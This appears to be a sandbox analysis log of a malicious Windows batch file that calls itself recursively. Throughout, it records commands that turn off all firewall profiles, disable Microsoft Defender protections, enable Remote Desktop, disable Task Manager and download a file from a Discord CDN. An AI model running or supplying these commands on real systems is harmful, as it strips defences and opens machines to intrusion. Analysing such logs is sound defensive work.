C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off26⤵PID:1844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off26⤵PID:1888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off26⤵PID:8
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"26⤵PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"26⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"26⤵PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"26⤵PID:1944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"26⤵PID:4664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"26⤵PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"26⤵
- Blocklisted process makes network request
PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"26⤵
- Command and Scripting Interpreter: PowerShell
PID:8 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"27⤵PID:4908
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"28⤵PID:2948
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f28⤵PID:4336
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"28⤵PID:5008
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f28⤵PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:2512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵PID:1512
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:3708
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:4708
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable28⤵PID:4280
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE28⤵PID:804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off28⤵PID:2588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off28⤵PID:2572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off28⤵PID:3580
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off28⤵
- Modifies Windows Firewall
PID:1256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off28⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"28⤵PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"28⤵PID:4968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"28⤵PID:1244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"28⤵PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"28⤵PID:3580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"28⤵PID:196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"28⤵
- Blocklisted process makes network request
PID:3560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"28⤵
- Command and Scripting Interpreter: PowerShell
PID:920 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"29⤵PID:5072
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"30⤵PID:3864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f30⤵PID:1004
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"30⤵PID:1276
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f30⤵PID:360
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:3620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:3624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:3372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:168
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable30⤵PID:1844
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE30⤵
- Modifies Windows Firewall
PID:3440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off30⤵PID:4092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off30⤵PID:3128
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off30⤵PID:348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off30⤵PID:1652
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off30⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"30⤵PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"30⤵PID:4664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"30⤵PID:1660
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"30⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"30⤵PID:348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"30⤵PID:3676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"30⤵
- Blocklisted process makes network request
PID:3636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"30⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:1568 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"31⤵PID:3108
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"32⤵PID:2032
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f32⤵PID:1524
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"32⤵PID:2200
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f32⤵PID:4116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:2088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:3544
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable32⤵
- Modifies Windows Firewall
PID:2956
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE32⤵PID:408
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off32⤵
- Modifies Windows Firewall
PID:96
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off32⤵PID:3624
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off32⤵PID:1288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off32⤵PID:1876
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off32⤵PID:1352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"32⤵PID:4160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"32⤵PID:1148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"32⤵PID:1844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"32⤵PID:1256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"32⤵PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"32⤵PID:3156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"32⤵
- Blocklisted process makes network request
PID:4428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"32⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:608 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"33⤵PID:1804
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"34⤵PID:4152
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f34⤵PID:3544
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"34⤵PID:2528
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f34⤵PID:1988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:1352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:4272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵PID:1340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:1700
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable34⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE34⤵PID:1448
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off34⤵PID:2032
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off34⤵PID:3796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off34⤵PID:4836
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off34⤵PID:3588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off34⤵PID:4732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"34⤵PID:1568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"34⤵PID:4336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"34⤵PID:1276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"34⤵PID:2528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"34⤵PID:4836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"34⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"34⤵
- Blocklisted process makes network request
PID:396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"34⤵
- Command and Scripting Interpreter: PowerShell
PID:3580 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"35⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"36⤵PID:1700
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f36⤵PID:4080
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"36⤵PID:2892
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f36⤵PID:1300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:4732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:3052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:368
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable36⤵PID:1564
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE36⤵PID:4892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off36⤵PID:4664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off36⤵PID:4092
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off36⤵PID:1152
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off36⤵PID:2216
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off36⤵PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"36⤵PID:1920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"36⤵PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"36⤵PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"36⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"36⤵PID:1152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"36⤵PID:4048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"36⤵
- Blocklisted process makes network request
PID:1100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"36⤵PID:4776
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"37⤵PID:608
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"38⤵PID:1560
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f38⤵PID:1804
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"38⤵PID:1300
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f38⤵PID:2940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:3392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:3864
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable38⤵PID:2912
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE38⤵PID:4760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off38⤵PID:3860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off38⤵PID:1760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off38⤵PID:3764
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off38⤵PID:204
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off38⤵
- Modifies Windows Firewall
PID:4448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"38⤵PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"38⤵PID:2616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"38⤵PID:1140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"38⤵PID:1980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"38⤵PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"38⤵PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"38⤵
- Blocklisted process makes network request
PID:2824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"38⤵
- Command and Scripting Interpreter: PowerShell
PID:2520 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"39⤵PID:4760
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"40⤵PID:3056
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f40⤵PID:2236
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"40⤵PID:3128
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f40⤵PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:1120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:1428
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable40⤵PID:3580
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE40⤵PID:996
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off40⤵PID:3028
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off40⤵PID:4452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off40⤵PID:4424
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off40⤵PID:2812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off40⤵
- Modifies Windows Firewall
PID:1124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"40⤵PID:4448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"40⤵PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"40⤵PID:1140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"40⤵PID:1472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"40⤵PID:488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"40⤵PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"40⤵
- Blocklisted process makes network request
PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"40⤵PID:5008
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"41⤵PID:996
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"42⤵PID:4452
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f42⤵PID:4816
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"42⤵PID:3372
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f42⤵PID:4296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:4688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:4968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:2324
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:3128
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable42⤵PID:600
-
-
